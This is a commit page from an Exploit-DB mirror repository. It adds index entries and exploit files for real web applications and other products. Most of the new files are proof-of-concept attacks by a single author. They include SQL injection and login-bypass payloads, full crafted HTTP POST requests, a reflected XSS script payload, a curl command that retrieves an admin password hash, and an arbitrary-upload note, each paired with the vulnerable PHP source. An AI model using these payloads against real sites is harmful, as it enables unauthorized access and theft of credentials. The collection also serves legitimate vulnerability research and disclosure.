bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 01_24_2014

Browse source
This commit is contained in:
Offensive Security 2014-01-24 04:30:44 +00:00
parent 5de5e59242
commit b692692c1c
13 changed files with 381 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

12
files.csv
View file

@ -27882,6 +27882,7 @@ id,file,description,date,author,platform,type,port
31051,platforms/linux/remote/31051.txt,"Mozilla Firefox 2.0 chrome:// URI JavaScript File Request Information Disclosure Vulnerability",2008-01-19,"Gerry Eisenhaur",linux,remote,0
31052,platforms/linux/remote/31052.java,"Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability",2008-01-22,"Stefano Di Paola",linux,remote,0
31053,platforms/php/remote/31053.php,"PHP <= 5.2.5 cURL 'safe mode' Security Bypass Vulnerability",2008-01-23,"Maksymilian Arciemowicz",php,remote,0
31054,platforms/linux/dos/31054.txt,"SDL_image 1.2.6 Invalid GIF File LWZ Minimum Code Size Remote Buffer Overflow Vulnerability",2008-01-23,"Gynvael Coldwind",linux,dos,0
31055,platforms/asp/webapps/31055.txt,"Multiple Web Wiz Products Remote Information Disclosure Vulnerability",2008-01-23,"AmnPardaz ",asp,webapps,0
31056,platforms/windows/remote/31056.py,"HFS HTTP File Server 1.5/2.x Multiple Security Vulnerabilities",2008-01-23,"Felipe M. Aragon",windows,remote,0
31057,platforms/osx/dos/31057.html,"Apple iPhone Mobile Safari Memory Exhaustion Remote Denial of Service Vulnerability",2008-01-24,fuzion,osx,dos,0
@ -27946,6 +27947,7 @@ id,file,description,date,author,platform,type,port
31118,platforms/windows/remote/31118.c,"Microsoft Works 8.0 File Converter Field Length Remote Code Execution Vulnerability",2008-02-06,"Luigi Auriemma",windows,remote,0
31120,platforms/php/webapps/31120.txt,"MODx 0.9.6 index.php Multiple Parameter XSS",2008-02-07,"Alexandr Polyakov",php,webapps,0
31121,platforms/php/webapps/31121.txt,"Joomla! and Mambo com_sermon 0.2 Component 'gid' Parameter SQL Injection Vulnerability",2008-02-07,S@BUN,php,webapps,0
31122,platforms/windows/dos/31122.txt,"Ipswitch Instant Messaging 2.0.8.1 Multiple Security Vulnerabilities",2008-02-07,"Luigi Auriemma",windows,dos,0
31123,platforms/php/webapps/31123.txt,"PowerScripts PowerNews 2.5.6 'subpage' Parameter Multiple Local File Include Vulnerabilities",2008-02-08,"Alexandr Polyakov",php,webapps,0
31124,platforms/php/webapps/31124.txt,"Calimero.CMS 3.3 'id' Parameter Cross Site Scripting Vulnerability",2008-02-08,Psiczn,php,webapps,0
31125,platforms/php/webapps/31125.txt,"Joovili 2.1 'members_help.php' Remote File Include Vulnerability",2008-02-08,Cr@zy_King,php,webapps,0
@ -27955,9 +27957,19 @@ id,file,description,date,author,platform,type,port
31129,platforms/php/webapps/31129.txt,"Managed Workplace Service Center 4.x/5.x/6.x Installation Information Disclosure Vulnerability",2008-02-08,"Brook Powers",php,webapps,0
31130,platforms/multiple/remote/31130.txt,"Apache Tomcat <= 6.0.15 Cookie Quote Handling Remote Information Disclosure Vulnerability",2008-02-09,"John Kew",multiple,remote,0
31131,platforms/php/webapps/31131.txt,"PK-Designs PKs Movie Database 3.0.3 'index.php' SQL Injection and Cross-Site Scripting Vulnerabilities",2008-02-09,Houssamix,php,webapps,0
31132,platforms/hardware/remote/31132.txt,"Group Logic ExtremeZ-IP File and Print Servers 5.1.2 x15 Multiple Vulnerabilities",2008-02-10,"Luigi Auriemma",hardware,remote,0
31133,platforms/hardware/remote/31133.txt,"F5 BIG-IP 9.4.3 Web Management Interface Cross-Site Request Forgery Vulnerability",2008-02-11,nnposter,hardware,remote,0
31134,platforms/php/webapps/31134.txt,"VWar 1.5 'calendar.php' SQL Injection Vulnerability",2008-02-11,Pouya_Server,php,webapps,0
31135,platforms/php/webapps/31135.txt,"Rapid-Source Rapid-Recipe Component Multiple SQL Injection Vulnerabilities",2008-02-11,breaker_unit,php,webapps,0
31136,platforms/multiple/dos/31136.txt,"cyan soft Multiple Applications Format String Vulnerability and Denial of Service Vulnerability",2008-02-11,"Luigi Auriemma",multiple,dos,0
31137,platforms/php/webapps/31137.txt,"Joomla! and Mambo com_comments Component 0.5.8.5g 'id' Parameter SQL Injection Vulnerability",2008-02-11,CheebaHawk215,php,webapps,0
31138,platforms/windows/dos/31138.txt,"Larson Network Print Server 9.4.2 build 105 (LstNPS) NPSpcSVR.exe License Command Remote Overflow",2008-02-11,"Luigi Auriemma",windows,dos,0
31139,platforms/windows/dos/31139.txt,"Larson Network Print Server 9.4.2 build 105 (LstNPS) Logging Function USEP Command Remote Format String",2008-02-11,"Luigi Auriemma",windows,dos,0
31140,platforms/php/webapps/31140.txt,"iTechClassifieds 3.03.057 - SQL Injection",2014-01-23,vinicius777,php,webapps,0
31141,platforms/php/webapps/31141.txt,"godontologico 5 - SQL Injection (0day)",2014-01-23,vinicius777,php,webapps,0
31142,platforms/php/webapps/31142.txt,"Simple e-document 1.31 - Login bypass",2014-01-23,vinicius777,php,webapps,0
31143,platforms/php/webapps/31143.txt,"PizzaInn_Project - SQL Injection",2014-01-23,vinicius777,php,webapps,0
31144,platforms/php/webapps/31144.txt,"mySeatXT 0.2134 - SQL Injection",2014-01-23,vinicius777,php,webapps,0
31145,platforms/php/webapps/31145.txt,"Easy POS System - SQL Injection (login.php)",2014-01-23,vinicius777,php,webapps,0
31146,platforms/php/webapps/31146.txt,"Cells Blog 3.3 - XSS Reflected & Blind SQLite Injection",2014-01-23,vinicius777,php,webapps,0
31147,platforms/php/webapps/31147.txt,"Adult Webmaster PHP - Password Disclosure",2014-01-23,vinicius777,php,webapps,0

Can't render this file because it is too large.

9
platforms/hardware/remote/31132.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27718/info
ExtremeZ-IP File and Print servers are prone to multiple vulnerabilities including denial-of-service and information-disclosure issues.
Attackers can exploit these issues to cause denial-of-service conditions or to obtain potentially sensitive information.
These issues affect versions prior to ExtremeZ-IP File Server 5.1.2x15 and ExtremeZ-IP Print Server 5.1.2x15.
http://www.exploit-db.com/sploits/31132.zip

9
platforms/linux/dos/31054.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27417/info
The SDL_image library is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. The issue occurs when handling malformed GIF images.
Attackers can leverage this issue to execute arbitrary code in the context of an application using the library. Successful exploits will compromise the application and possibly the underlying computer. Failed attacks will cause denial-of-service conditions.
Versions prior to SDL_image 1.2.7 are vulnerable.
http://www.exploit-db.com/sploits/31054.gif

18
platforms/multiple/dos/31136.txt Executable file
View file

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/27728/info
Multiple cyan soft products are affected by a format-string vulnerability because they fail to adequately sanitize user-supplied input before passing it as the format-specifier to a formatted-printing function.
These applications are also affected by a denial-of-service vulnerability because they fail to adequately handle certain commands during the start of a connection.
Attackers can leverage these issues to execute arbitrary code in the context of the application or to terminate the application. Successful attacks will compromise the applications or deny access to legitimate users.
The following applications are affected:
Opium4 OPI Server 4.10.1028 and prior
cyanPrintIP Easy OPI 4.10.1030 and prior
cyanPrintIP Professional 4.10.1030 and prior
cyanPrintIP Workstation 4.10.836 and prior
cyanPrintIP Standard 4.10.940 and prior
cyanPrintIP Basic 4.10.1030 and prior
http://www.exploit-db.com/sploits/31136.zip

22
platforms/php/webapps/31140.txt Executable file
View file

@ -0,0 +1,22 @@
# Exploit Title: iTechClassifieds v3.03.057 - SQL Injection
# Date: 23/01/2014
# Exploit Author: vinicius777
# Vendor Homepage: http://itechscripts.com/download.html
# Software Link: http://itechscripts.com/downloads/download_itechclassifieds.html
# Version: 3.03.057
[1] SQL Injection - PreviewNun
PoC: http://localhost/iTechClassifieds_v3/ChangeEmail.php?PreviewNum=1' [SQL INJECTION]
[2] SQL Injection - CatID
PoC: http://localhost/iTechClassifieds_v3/ViewCat.php?CatID=[SQL INJECTION]
#
#
# Greetz to g0tm1lk and TheColonial.

56
platforms/php/webapps/31141.txt Executable file
View file

@ -0,0 +1,56 @@
########################################################################################
[+] Exploit: 0day godontologico v5 - SQL Inject #
[+] Author: vinicius777 #
[+] Contact: vinicius777 [AT] gmail - @vinicius777_ #
[+] Vendor Homepage: http://sourceforge.net/projects/godontologico/ #
[+] Google D0rks: "Smile Odonto - Enhancing your smile - www.smileodonto.com.br" #
[+] Google D0rks: "Smile Odonto ® - Valorizando seu sorriso - www.smileodonto.com.br" #
########################################################################################
### Mummy bought me a new hat today #
You can considerate it a 0day! Once logged as 'admin' browse to 'Utilites' -> 'Files' -> 'Clinic Files', upload whatever you want to, access it by clicking in 'View File' or browse directly through 'http://xxx/arquivos/daclinica/files. Enjoy it xD ###
[1] Sql Injection POST Time Based Blind
#Note: Time based Injection on POST requests as indicated on the output. You might use sqlmap -l to load it though. Admin hashes under Table funcionarios' on column senha'.
PoC:
POST /gco/wallpapers/index_ajax.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://localhost/gco/
Content-Length: 61
Cookie: __atuvc=3%7C3; res_session=5mYRbQ67qPN3Zx%2FH%2FPKLDcSgbu3FmjzVAfezt0G0Hapsi7GRhIzlauDhsVpWaAeOu8MAa2wkiyHTT%2BGemuchDNMd1kQYMKbXSp6MFx8BS6A05M%2FIxw0vP2XGGDE5iSzrDERGO6QQa4pOXRjpMD4aYL8%2BQPCj98JZrngcZnhoEFWekObo5EWdnnuhg8zpmWL26dMuzY9uPu%2BO60BwSiVU0CCrFKxc5lMkSH%2BE9%2FwxI4XQpVE%2Bb9X4StmPGMMiZ1it0mJcChZdz4Mku1WJcOrzLVN0RYZYIvARwBiMXdGf%2Bvpw%2F0MHPP09fBv0PRgNI4XAI9apbQ7RLlxK6LneiNaR0epLS1YQiRpucBxtI0AiKofvOK5THZM6KSenIxsqUsrSxtff6eic0prlZb%2Fvl%2B3unAIgFdcAREUhQZ6lytABxA3CRMuZUmb2lyU7cWb%2FnyhQ9BtCXtfSTrdJze6JIFxsFg%3D%3D; __utma=111872281.1068821941.1389863798.1389863798.1389863798.1; __utmz=111872281.1389863798.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ck_login_id_20=1; ck_login_language_20=en_us; ck_login_theme_20=Sugar5; sLogin=admin; bLicense53=true; ccss=2; ws_session=cbm4nhtn24jn9mhfvbjimjjl55; mySession_ID=rkc83o3o3e5df60aoocpb2bqb1; groupoffice=u8q9fb14k1jqvl0vtaidqr3va1; PHPSESSID=pk5053kt9fh1p1jm8kcvn6kh05; Loggedin=True
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
usuario=['SQL INJECTION']&senha=%70%61%73%73&login=%4C%6F%67%69%6E
Vulnerable Code:
[+] wallpapers/index_ajax.php
$nivel = 'Funcionario';
$row = mysql_fetch_array(mysql_query("SELECT * FROM `funcionarios` WHERE `usuario` = '$_POST[usuario]'"));
if($row[nome] == "") {
$nivel = 'Dentista';
$row = mysql_fetch_array(mysql_query("SELECT * FROM `dentistas` WHERE `usuario` = '$_POST[usuario]'"));
if($row[nome] == "") {
//echo "<scr"."ipt>alert('Login ou senha incorretos!'); Ajax('wallpapers/index', 'conteudo', '')</scr"."ipt>";
}
#
#
# Greetz to g0tm1lk and TheColonial.

43
platforms/php/webapps/31142.txt Executable file
View file

@ -0,0 +1,43 @@
##########################################################################
[+] Exploit: Simple e-document v1.31 Login Bypass #
[+] Author: vinicius777 #
[+] Contact: vinicius777 [AT] gmail @vinicius777sec #
[+] version: Simple e-document v1.31 #
[+] Vendor Homepage: http://sourceforge.net/projects/simplee-doc/files/ #
##########################################################################
[1] Sql Injection on username field
PoC: username=-4731' OR (2708=2708)#
# Burp output
POST /simple_e_document_v_1_31/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/simple_e_document_v_1_31/index.php
Cookie: username=-4731%27+OR+%282708%3D2708%29%23; access=3; __atuvc=3%7C3; res_session=5mYRbQ67qPN3Zx%2FH%2FPKLDcSgbu3FmjzVAfezt0G0Hapsi7GRhIzlauDhsVpWaAeOu8MAa2wkiyHTT%2BGemuchDNMd1kQYMKbXSp6MFx8BS6A05M%2FIxw0vP2XGGDE5iSzrDERGO6QQa4pOXRjpMD4aYL8%2BQPCj98JZrngcZnhoEFWekObo5EWdnnuhg8zpmWL26dMuzY9uPu%2BO60BwSiVU0CCrFKxc5lMkSH%2BE9%2FwxI4XQpVE%2Bb9X4StmPGMMiZ1it0mJcChZdz4Mku1WJcOrzLVN0RYZYIvARwBiMXdGf%2Bvpw%2F0MHPP09fBv0PRgNI4XAI9apbQ7RLlxK6LneiNaR0epLS1YQiRpucBxtI0AiKofvOK5THZM6KSenIxsqUsrSxtff6eic0prlZb%2Fvl%2B3unAIgFdcAREUhQZ6lytABxA3CRMuZUmb2lyU7cWb%2FnyhQ9BtCXtfSTrdJze6JIFxsFg%3D%3D; __utma=111872281.1068821941.1389863798.1389863798.1389863798.1; __utmz=111872281.1389863798.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ck_login_id_20=1; ck_login_language_20=en_us; ck_login_theme_20=Sugar5; ws_session=cbm4nhtn24jn9mhfvbjimjjl55; PHPSESSID=unqjr3tdi0tbgl3if801atjhl7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
username=-4731%27+OR+%282708%3D2708%29%23&password=&op=login&Submit=Login
Vulnerable Code:
[+] login.php
$username= stripslashes($_POST['username']);
$password= stripslashes($_POST['password']);
$r_password = md5($password);
$sql = "SELECT * From edocphp_users WHERE username='$username' AND password ='$r_password'";
#
#
# Greetz to g0tm1lk and TheColonial.

27
platforms/php/webapps/31143.txt Executable file
View file

@ -0,0 +1,27 @@
##########################################################################
[+] Exploit: PizzaInn_Project - SQL Injection #
[+] Author: vinicius777 #
[+] Contact: vinicius777 [AT] gmail @vinicius777_ #
[+] Vendor Homepage: http://sourceforge.net/projects/restaurantmis/ #
##########################################################################
[1] Sql Injection Time Based Blind
PoC: http://127.0.0.1/reserve-exec.php?id=1' [SQL Injection]
Vulnerable Code:
[+] reserve-exec.php
$id = $_GET['id'];
$qry = "INSERT INTO reservations_details(member_id,table_id,partyhall_id,Reserve_Date,Reserve_Time,table_flag,partyhall_flag) VALUES('$id','$table_id','$partyhall_id','$date','$time','$table_flag','$partyhall_flag')";
mysql_query($qry)
#
#
# Greetz to g0tm1lk and TheColonial.

27
platforms/php/webapps/31144.txt Executable file
View file

@ -0,0 +1,27 @@
########################################################################################
[+] Exploit: mySeatXT 0.2134 #
[+] Author: vinicius777 #
[+] Contact: vinicius777 [AT] gmail @vinicius777_ #
[+] Vendor Homepage: http://sourceforge.net/projects/myseat #
########################################################################################
[1] Sql Injection
PoC: http://localhost/mySeatXT/web/ajax/autocomplete_res.php?term=99' ['SQL INJECT']
Vulnerable Code:
[+] autocomplete_res.php
$sql = "SELECT * FROM reservations WHERE reservation_guest_name LIKE '".$_GET['term']."%' GROUP BY reservation_guest_name ";
$fetch = mysql_query($sql);
#
#
# Greetz to g0tm1lk and TheColonial.

48
platforms/php/webapps/31145.txt Executable file
View file

@ -0,0 +1,48 @@
########################################################################################
[+] Exploit: Easy POS System - SQL Injection #
[+] Author: vinicius777 #
[+] Contact: vinicius777 [AT] gmail @vinicius777_ #
[+] Vendor Homepage: http://sourceforge.net/projects/easypossystem/ #
########################################################################################
[1] Sql Injection POST Time Based Blind
#Note: Time based Injection on POST requests using burp, as output indicated. You might use sqlmap -l to load it though.
PoC:
POST /login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/login.php
Cookie: __atuvc=3%7C3; res_session=5mYRbQ67qPN3Zx%2FH%2FPKLDcSgbu3FmjzVAfezt0G0Hapsi7GRhIzlauDhsVpWaAeOu8MAa2wkiyHTT%2BGemuchDNMd1kQYMKbXSp6MFx8BS6A05M%2FIxw0vP2XGGDE5iSzrDERGO6QQa4pOXRjpMD4aYL8%2BQPCj98JZrngcZnhoEFWekObo5EWdnnuhg8zpmWL26dMuzY9uPu%2BO60BwSiVU0CCrFKxc5lMkSH%2BE9%2FwxI4XQpVE%2Bb9X4StmPGMMiZ1it0mJcChZdz4Mku1WJcOrzLVN0RYZYIvARwBiMXdGf%2Bvpw%2F0MHPP09fBv0PRgNI4XAI9apbQ7RLlxK6LneiNaR0epLS1YQiRpucBxtI0AiKofvOK5THZM6KSenIxsqUsrSxtff6eic0prlZb%2Fvl%2B3unAIgFdcAREUhQZ6lytABxA3CRMuZUmb2lyU7cWb%2FnyhQ9BtCXtfSTrdJze6JIFxsFg%3D%3D; __utma=111872281.1068821941.1389863798.1389863798.1389863798.1; __utmz=111872281.1389863798.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ck_login_id_20=1; ck_login_language_20=en_us; ck_login_theme_20=Sugar5; sLogin=admin; bLicense53=true; ccss=2; ckPLC=YTo0OntzOjY6ImtleV9pZCI7czoyMzoiZjEzYTUwNDMxYTU5Njk2MDdiYWQxNzgiO3M6NzoidXNlcl9pZCI7czoxOiIxIjtzOjEwOiJ1c2VyX2FnZW50IjtzOjgxOiJNb3ppbGxhLzUuMCAoWDExOyBMaW51eCBpNjg2OyBydjoyMi4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzIyLjAgSWNld2Vhc2VsLzIyLjAiO3M6NzoibGFzdF9pcCI7czozOiI6OjEiO30%3D; ws_session=cbm4nhtn24jn9mhfvbjimjjl55; mySession_ID=rkc83o3o3e5df60aoocpb2bqb1; groupoffice=u8q9fb14k1jqvl0vtaidqr3va1; PHPSESSID=pk5053kt9fh1p1jm8kcvn6kh05; Loggedin=True; ICMSSESSION=r9hvp4g43vra6krgbrhmpdpb57; cunity_sess%2Fvar%2Fwww=khgb25qkkbocjd2q9dj4c8smh7; theme=15fde18a36dda46789cc971f08ead1d78bc9f55c%7Edefault; session=s4c5dj9pq24vk1b23ar59bnhs6; PHPAdvocat=1iko66spebalanv8teljc4ka26
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 54
emailid=admin%40admin.com&password=admin&submit=Submit
Vulnerable Code:
[+] login.php
if(isset($_POST['submit'])){
$emailid = stripslashes($_POST['emailid']);
$password = stripslashes($_POST['password']);
//echo "shop id = ".$shopid;
$sqlrec = "select * from users where emailid = '".$emailid."' and password = '".$password."'";
$resrec = mysql_query($sqlrec);
$rowuser = mysql_fetch_assoc($resrec);
#
#
# Greetz to g0tm1lk and TheColonial.

53
platforms/php/webapps/31146.txt Executable file
View file

@ -0,0 +1,53 @@
################################################################
[+] Exploit: Cells v3.3 XSS Reflected & Blind SQLite Injection #
[+] Author: vinicius777 #
[+] Contact: vinicius777 [AT] gmail @vinicius777_ #
[+] version: Cells Blog 3.3 #
[+] Vendor Homepage: http://cells.tw #
################################################################
[+] 14/01/2014 vendor contacted
[+] 17/01/2014 no response from vendor
[+] 20/01/2014 no response from vendor
[+] 21/01/2014 Published
[1] Reflective XSS on 'msg='
PoC:
http://localhost/cells-v3-3/errmsg.php?msg= [%3C%2Fp%3E%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E%3Cp%3E]
Vulnerable Code:
[+] errmsg.php
<?
echo "<img src='images/error.gif'>";
if (isset($_GET["msg"])){$msg=$_GET["msg"];}else{$msg="";}
if ($msg!=""){
echo "<br><br><br>".$msg;
}else{
echo "<br><br><br>You may key in something wrong.<br>Please try it again! ..... ";
echo " If you always got this message, <br>please send a <a href='pub_pubmsg.php?bgid=1'>".$face_report."</a>";
echo " to the web master.";
}
?>
[2] Blind SQLite Injection on 'pcid'
PoC:
http://localhost/cells-v3-3/user.php?pcid= [SQLite Injection]
Vulnerable Code:
[+] user.php
if($_GET["pcid"]!=""){
$sql="select * from users where cdt='n' and pcid=".$_GET["pcid"];
#
#
# Greetz to g0tm1lk and TheColonial.

48
platforms/php/webapps/31147.txt Executable file
View file

@ -0,0 +1,48 @@
##########################################################################
[+] Exploit:Adult Webmaster PHP - Password Disclosure #
[+] Author: vinicius777 #
[+] Email/Twitter: vinicius777 [AT] gmail @vinicius777_ #
[+] Vendor Homepage: http://sourceforge.net/projects/adultweb/ #
##########################################################################
[1] Administrative Credential Disclosure
PoC:
root@kali:/# curl http://localhost/home/caspers/public_html/demo/admin/userpwdadfasdfre.txt
admin:3a4ebf16a4795ad258e5408bae7be341
#
Vulnerable Code:
[+] admin/common.php
// Check user existance
$pfile = fopen("userpwdadfasdfre.txt","a+");
rewind($pfile);
while (!feof($pfile)) {
$line = fgets($pfile);
$tmp = explode(':', $line);
if ($tmp[0] == $user) {
$errorText = "The selected user name is taken!";
break;
}
}
// If everything is OK -> store user data
if ($errorText == ''){
// Secure password string
$userpass = md5($pass1);
fwrite($pfile, "\r\n$user:$userpass");
}
fclose($pfile);
#
#
# Greetz to g0tm1lk and TheColonial.

9
platforms/windows/dos/31122.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27677/info
Ipswitch Instant Messaging is prone to multiple security vulnerabilities, including a denial-of-service vulnerability, a format-string vulnerability, and a vulnerability that allows attackers to overwrite arbitrary files.
Attackers can exploit these issues to execute arbitrary code, cause denial-of-service conditions, or overwrite files with arbitrary content.
These issues affect Ipswitch Instant Messaging 2.0.8.1; other versions may also be affected.
http://www.exploit-db.com/sploits/31122.zip